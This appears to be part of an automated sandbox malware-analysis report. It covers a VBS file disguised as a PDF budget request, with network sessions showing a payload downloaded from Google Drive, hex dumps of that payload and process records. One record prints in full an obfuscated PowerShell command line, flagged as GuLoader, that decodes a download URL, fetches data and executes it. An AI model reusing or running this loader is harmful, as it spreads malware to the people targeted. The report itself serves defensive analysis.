                                        Content-Security-Policy: script-src 'nonce-fUsFJEFEND24o86MUoRH9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.459083142.250.186.1614438076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 05:19:05 UTC258OUTGET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:19:08 UTC4859INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="sLgRDOfJZMJPu27.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 106560
                                        Last-Modified: Mon, 30 Sep 2024 03:50:27 GMT
                                        X-GUploader-UploadID: AD-8ljuWSCsPe3F9Xw5RPHhN-mpVxLyii7yHD2hHTgKaK8Q9695n6QdKkralx-Fg6uhCw2cSHzkU9843Rw
                                        Date: Wed, 02 Oct 2024 05:19:08 GMT
                                        Expires: Wed, 02 Oct 2024 05:19:08 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=p83L0w==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-10-02 05:19:08 UTC4859INData Raw: b8 07 0c 49 27 ce aa e4 0a 98 3b 76 f9 30 60 ec 72 9a d6 19 43 3c ab 37 e3 98 7e 24 c7 3a 7e 9b ee fd a4 1d c4 7a b3 4f 4f 5b 4d b3 f8 99 24 df 0d af 8e 34 18 17 17 e9 b0 85 05 23 62 eb a3 a9 b9 e1 d8 cb b9 c1 9b 65 8a 7d 99 85 4b de 44 35 09 f4 ac d2 18 25 27 10 eb 2f 6b 01 00 20 75 b5 cf 59 89 01 3b 86 5d 9b 5c 1a 9f b3 59 f6 e9 de bc 3c 45 3e 8c 1b 0d 7f 67 55 9b e7 a9 e2 42 cf 59 b8 d7 08 f6 b2 f6 22 40 da 7a b5 2b f7 bf f8 57 8c 06 2c a8 8e 25 2d 2e fe d4 f1 4c 7b 76 19 5e 73 71 a5 a2 24 a2 9d 78 a4 d9 4e fc a9 fb c8 93 b9 1f 4d a1 da 1d f7 7c e3 2b 1b e8 4f 14 b8 18 a9 7a 48 9c b2 8f 9e 7c 03 f2 e4 ff a5 a3 91 45 32 b4 7f 57 0c f4 9a 87 27 00 96 5c 13 99 46 5c ed b4 0b a9 6c 47 b4 ca 34 c3 e3 b8 de 33 1d b1 ac 73 c7 d9 d5 61 9b 12 97 3b 32 20 c0 7f
                                        Data Ascii: I';v0`rC<7~$:~zOO[M$4#be}KD5%'/k uY;]\Y<E>gUBY"@z+W,%-.L{v^sq$xNM|+OzH|E2W'\F\lG43sa;2
                                        2024-10-02 05:19:08 UTC4859INData Raw: 2e c6 f9 82 64 4b 89 92 b3 22 70 1c 63 f9 eb 58 92 f6 9a 95 6e ba fc 6a b7 1b c5 97 6e 28 4d 53 29 f4 31 8a 51 05 a9 ce e8 44 6b 21 0a c8 7b 71 67 62 eb 51 34 4e b8 8e cf e5 91 57 90 96 74 e6 f0 88 2e 24 a6 e3 ad c7 7c c2 25 e5 e7 5c 3d d9 10 e6 40 74 9f 16 7a 20 fd 96 85 00 6b 6a e6 f8 e7 be 40 10 90 84 bc 55 d0 c1 8f ef 47 c0 61 82 18 ae 3e 6a e1 9b 39 f9 a8 3f 07 26 dd 18 42 cc da d8 74 b2 4e 5c db 14 bf 7e 95 8e c2 99 14 d5 9d bb 33 bb e0 c4 f0 42 96 0b a9 bd 4e cd fc c6 91 db 44 02 0f 0d 38 75 4f 0f 7c 44 04 f4 33 1e 58 ef 6e e5 13 f1 68 76 38 00 40 df 28 2c d7 db d0 98 e6 47 68 85 17 49 10 63 ad 21 56 c0 9b 42 3f cd 1d 34 d2 77 18 2f d8 90 eb 29 03 d4 c5 6f 1e 9c 40 f7 fb df c6 2c cb 64 64 36 06 1a 25 1f 15 56 86 60 d0 32 74 0b ec b3 d7 ed a6 d4 87
                                        Data Ascii: .dK"pcXnjn(MS)1QDk!{qgbQ4NWt.$|%\=@tz kj@UGa>j9?&BtN\~3BND8uO|D3Xnhv8@(,GhIc!VB?4w/)o@,dd6%V`2t
                                        2024-10-02 05:19:08 UTC119INData Raw: f6 46 e2 e0 62 7f 1e a7 8c 80 1c 34 be e0 11 08 21 20 bd 8b 62 bf 57 b4 fe f1 59 3f da 2a 6f 1f 14 96 6a 0c 23 ec 43 18 33 a7 b7 cd 29 06 40 83 04 8d 37 df 8f dd dd 9c 08 7e f0 6e ed 59 d8 90 30 72 ea 29 7d 64 8a a4 17 1e 61 e6 4c 19 f2 96 3b 5b 3a 35 71 8e fa 46 d2 95 2b 46 37 dc c2 2a 1d 04 13 c9 33 5c ec 42 a1 f5 20 c4 f4 be 51 a8 f0 7f d5 9e 54 b8 a9
                                        Data Ascii: Fb4! bWY?*oj#C3)@7~nY0r)}daL;[:5qF+F7*3\B QT
                                        2024-10-02 05:19:08 UTC1325INData Raw: 54 87 a3 08 fa cc 9f c9 15 bf 75 b9 c3 ca a0 f4 e1 20 cb 00 dc 33 a5 70 e6 56 74 e4 23 fa bd ca e9 0d 11 d4 3e d0 63 63 d6 c2 96 7f 48 32 01 d0 3b 8f e3 ba d2 e3 de 25 cc 41 7c 2d 87 61 e9 52 7d 1a 45 85 78 50 72 10 0f c3 38 fc 28 fc 69 4a bd e6 ef 6f f2 1b 64 bf db 2e 1c 26 fd ad 1d 62 f3 5b fd 3d c0 08 b3 68 d2 c1 ea 20 10 74 48 a0 86 78 8d 2f 7e fe 78 c8 a7 8a 9a 48 15 bb 48 64 b4 9e 3d 50 f5 05 c0 81 c8 4c 5d ad cc ad 34 f2 36 45 1f 68 8b c0 50 df c6 3d e7 25 c6 97 ef 69 86 24 94 b2 be 42 4a 9c 19 02 96 86 6c ae aa e0 60 46 94 81 36 bc a6 b6 0a c1 0b 87 b0 21 33 be d1 61 b3 08 f0 2f 54 a5 42 d1 22 8e ab ec 08 9c ab e8 77 9f 41 01 50 c6 54 cb 06 7e ad 6f 01 fd d0 b5 9a 47 65 f8 a5 e5 93 29 8f 9b 88 9b 97 f5 7a 92 a5 e1 d1 48 36 97 5d e7 ae 43 54 3c 4d
                                        Data Ascii: Tu 3pVt#>ccH2;%A|-aR}ExPr8(iJod.&b[=h tHx/~xHHd=PL]46EhP=%i$BJl`F6!3a/TB"wAPT~oGe)zH6]CT<M
                                        2024-10-02 05:19:08 UTC1390INData Raw: 4b 0e ef bd 33 d2 dd 2f 38 3f 83 8a 47 e9 c6 1a f9 b5 fa 4f 32 66 44 cc 4d 2a d2 30 e4 55 09 79 fa 9e 44 5c c2 a8 03 2b 00 ec 2b 9e 46 78 9a 80 27 16 2a fc da 4f 98 cb 23 bb 84 0b 4e b2 98 ef d6 03 3b fa 75 aa a7 19 93 68 8c 3f ea 00 cf af ee 35 e9 85 b4 97 0e 28 5e ae 6a 42 1f da 44 7d 63 1f 8b ed 10 7d aa 36 e4 14 df 5b af d9 17 7f 9c df d4 1f 7c 9b af 2e c8 33 81 60 4d 0d 10 6c 8d 41 af 41 2f 2e 36 cb da e5 f1 4f b0 36 f0 6b df 86 60 ff 26 de 9e 64 67 53 09 d9 17 4d d0 24 da ac 82 4d fe 46 72 61 9e 0e c2 11 21 54 b4 d7 bf 14 db 33 94 1e 22 84 8b 46 7d 05 18 39 40 92 b9 c9 14 2c 47 e3 82 ae c9 b9 25 ef df d1 e3 5e c5 88 85 c6 d3 97 80 7e 20 21 1d 18 b8 b9 28 e3 2a cb e7 7d 44 cb e5 e8 ff ea 23 f0 06 32 38 ac 0e 37 22 d6 34 ca 11 c5 e6 8c 9f 65 08 35 d5
                                        Data Ascii: K3/8?GO2fDM*0UyD\++Fx'*O#N;uh?5(^jBD}c}6[|.3`MlAA/.6O6k`&dgSM$MFra!T3"F}9@,G%^~ !(*}D#287"4e5
                                        2024-10-02 05:19:08 UTC1390INData Raw: d4 9b 77 be 42 6a d1 cc 81 bf b3 21 1f 58 f4 3c 2c 74 3f d2 de 5f 97 27 45 c1 b7 6c be e3 de aa d1 a5 2c b8 20 c0 d2 dd d7 8f 75 42 b6 b2 51 80 69 e8 2a 6a 55 79 2e b3 53 36 b1 60 dc 60 81 10 d7 0b ce d3 2b 8f d0 6b 46 c6 b0 9a 2e 64 e1 a8 1b e6 ba 10 5e a7 a6 c1 44 2b fa 0c 73 e0 ce 91 f3 44 17 41 81 97 b0 bc b9 4b 00 69 7f 5c 21 c1 10 e6 92 b3 fe c2 71 2a fd bd 55 9f 26 e0 e2 f9 f8 fa 41 d4 b7 5a 6b 9d 77 ca 8d c0 5c 1a 8a 7d 41 2d c6 7e 9e 11 ed cd c8 3a 3b 63 53 46 81 ff 99 78 b5 e8 4b 1b 87 fd 4f 08 3e 55 b7 99 7e 40 75 eb 31 38 22 69 f4 96 3f 03 12 03 a4 cf ac 12 ee 24 12 7d da fa 8d f1 b9 74 90 ce 40 d0 fc 50 14 a3 62 3f 06 d5 b4 e8 ae ce 10 28 fb 9d 73 ab d9 68 e9 68 e3 c1 33 32 16 5b cc 43 4a fa 3d 55 e9 12 21 52 dc 18 ab d1 e5 e4 72 be 05 06 a5
                                        Data Ascii: wBj!X<,t?_'El, uBQi*jUy.S6``+kF.d^D+sDAKi\!q*U&AZkw\}A-~:;cSFxKO>U~@u18"i?$}t@Pb?(shh32[CJ=U!Rr
                                        2024-10-02 05:19:08 UTC1390INData Raw: 59 4e c6 5b 14 5f bc 82 ce 8c 43 d2 fb 26 22 d4 3f 46 51 01 e4 2b fa c7 f0 b3 6f ad e2 c3 0c 51 e1 cd 33 e6 e9 f1 60 79 4b 4e dd 31 1b 53 2d 4e 73 d8 65 a7 d0 1e 09 68 2c 24 f4 cf 0f 76 d1 08 46 02 c5 d7 ff c2 70 0c 7d 05 ed 7c 6c 15 56 e2 93 c8 b5 37 bd cd 08 a6 1d 2a c9 77 a7 6d f9 83 0e 00 3f 3c a1 2e 72 0a 5d ae 80 bb 3f 53 4b 25 94 4e 66 0a 87 80 9b c5 67 02 76 2a 50 d3 2b 87 be 87 e9 58 cd ee 04 b8 b6 57 9d f2 29 0e 20 67 d2 10 fd 58 60 ef 0b b5 8c 41 33 38 35 54 e1 27 e8 cf 65 9c 27 5f b3 9e 5f 3c 49 38 0e df 3c 21 5f b4 5f 4c 84 4b 3b bc bb d9 bd b9 4d ad a6 e0 3f 24 11 08 d6 bb b6 b0 8d da c4 7a 56 33 02 0e d7 cd d8 c5 ab 6e 71 56 93 03 45 7e a2 66 75 04 79 24 7c a5 0b 19 33 1f 99 09 b7 b2 30 03 ec b0 b0 14 89 c9 66 85 99 9c 1c 9b 92 d1 a0 3d 50
                                        Data Ascii: YN[_C&"?FQ+oQ3`yKN1S-Nseh,$vFp}|lV7*wm?<.r]?SK%Nfgv*P+XW) gX`A385T'e'__<I8<!__LK;M?$zV3nqVE~fuy$|30f=P
                                        2024-10-02 05:19:08 UTC1390INData Raw: ea b6 23 9e f9 70 72 90 4e 0f 36 1f 44 49 ac d5 38 76 91 e6 bb 51 1c 93 29 6d e7 da 35 c0 12 22 1d f1 ff 14 93 2d 1a a6 ab d0 e6 33 3c d5 61 c4 ec f6 ab c8 52 f2 28 59 cf b4 78 61 72 7b 7c a5 68 4d 88 b5 f8 70 a1 f3 fd 39 15 19 47 8a e3 3f 96 19 f8 41 8d 30 b9 c7 59 84 6a b3 9a 3f ad 4b 79 f7 ea f3 ce 2a 2a 51 cb 85 35 db 6d 2e 21 ce 65 b2 ec f6 96 46 5d cf c3 0a e4 39 12 aa bc 16 52 e5 0b 02 00 38 0d 51 6a a8 7c 75 2c 60 8a 6b 3c f5 cf cb 7e d1 b6 8c a7 4c 09 d3 bd b4 a3 c8 5d 93 f8 5f af 88 fd 0b 12 bf f3 2d bf 25 4b 4d 26 ed d7 5e a4 73 07 44 b7 92 e5 4a 5d 3b 05 98 c4 46 e1 aa a8 64 82 34 fc 82 70 f8 8b bc 4e 7f e2 44 fc c8 1c 5c 30 a6 04 4c c7 d7 a2 ee 54 e5 4f 38 1c 0a 62 3b e1 ff 10 b5 60 e4 78 77 8f 1a 64 18 a6 bb c7 0f 22 a5 30 c5 a6 6c ff 10 14
                                        Data Ascii: #prN6DI8vQ)m5"-3<aR(Yxar{|hMp9G?A0Yj?Ky**Q5m.!eF]9R8Qj|u,`k<~L]_-%KM&^sDJ];Fd4pND\0LTO8b;`xwd"0l
                                        2024-10-02 05:19:08 UTC1390INData Raw: 6f 38 a5 94 83 ff f7 8b 1f 9c 6a b0 60 97 76 92 4a 45 45 3d 69 23 d7 ef 57 9b 23 c1 55 b9 35 50 33 48 6a 0e 39 39 d9 53 56 55 31 44 f0 cb 20 fe a2 75 eb 28 04 ff 4e 17 fe 50 cc de b8 c1 1f 2f d2 cd 53 51 3c 68 79 27 8a 45 64 7b d5 79 ad 67 bb aa b0 7c 20 cb d0 12 2c 8c cb 32 99 a8 24 4e bf 92 c8 b3 b6 0a d2 e2 f1 57 35 be 68 96 8e 06 d7 0f 16 ae d1 98 96 5f 71 35 74 f0 86 4e 55 98 13 bf 22 fb 8f 4b 98 9f d4 93 ca 7e ee 71 cb ec 48 9d be 38 03 64 b9 9a b8 69 7e 02 b4 90 e8 43 df ca 93 9b 18 47 ba 50 72 78 f9 d7 10 ae 16 b4 74 1f e5 d5 b1 c9 5c b7 61 b6 f0 07 9a d4 24 e4 3e d6 39 a0 d6 66 39 cf 1c 77 cd 37 3a 01 69 26 e8 00 8a 65 4a 98 61 72 7b 7c 60 05 de 9c 3e 49 32 18 54 13 b8 f9 df 11 b9 15 75 96 bd fb 41 8d 4c d3 c5 5b d2 3c 24 dc 3d 0a fe 2f e8 e9 01
                                        Data Ascii: o8j`vJEE=i#W#U5P3Hj99SVU1D u(NP/SQ<hy'Ed{yg| ,2$NW5h_q5tNU"K~qH8di~CGPrxt\a$>9f9w7:i&eJar{|`>I2TuAL[<$=/
                                        2024-10-02 05:19:08 UTC1390INData Raw: 71 ef 09 25 be 26 77 55 9c d2 b2 51 ad 2a 1c cf 02 fa 13 ba 9d 05 5e 01 f7 25 39 ac b6 b5 fe 23 6b 93 43 33 e6 91 c3 dc d9 ef 84 5b 93 bb ff 76 50 fd e9 b9 5c 27 98 c4 e8 35 68 a1 05 04 a0 0a b2 95 38 ca 50 9c 34 9d 26 0b 00 60 3a e1 20 28 e5 3c 4a d5 ed cb 41 8d 42 26 00 2c 65 e0 10 71 41 45 e3 ee 4f a0 2a 48 50 7e 12 e6 eb e7 14 27 7b 58 ff 18 91 c6 34 1c 4e 02 fa c0 e6 84 aa 29 e8 13 e1 98 c7 91 da 16 ad 4d 0a 8f 6f 2e 87 0c 24 8d b2 2d b1 95 3d 81 31 b9 b2 0a 34 f6 4e 26 c0 78 8b 95 31 d0 39 2c 3f 50 63 94 ce 00 c5 00 e4 3c 66 02 11 28 49 4a b0 e6 63 97 ec c6 a6 4d f7 b2 c5 e0 2f 31 b5 20 41 1e cb b0 86 ca 33 04 44 e7 9a 0d 2c 32 0e b4 13 03 ab 63 5a ae db 79 ec ac 33 3b 4a 09 1c 24 86 52 6f 22 4e 72 b0 89 a6 1f e3 39 8c 41 d9 39 83 07 71 8a c5 13 be
                                        Data Ascii: q%&wUQ*^%9#kC3[vP\'5h8P4&`: (<JAB&,eqAEO*HP~'{X4N)Mo.$-=14N&x19,?Pc<f(IJcM/1 A3D,2cZy3;J$Ro"Nr9A9q


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:01:18:18
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs"
                                        Imagebase:0x7ff71cf20000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:01:18:20
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:01:18:20
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:01:18:37
                                        Start date:02/10/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
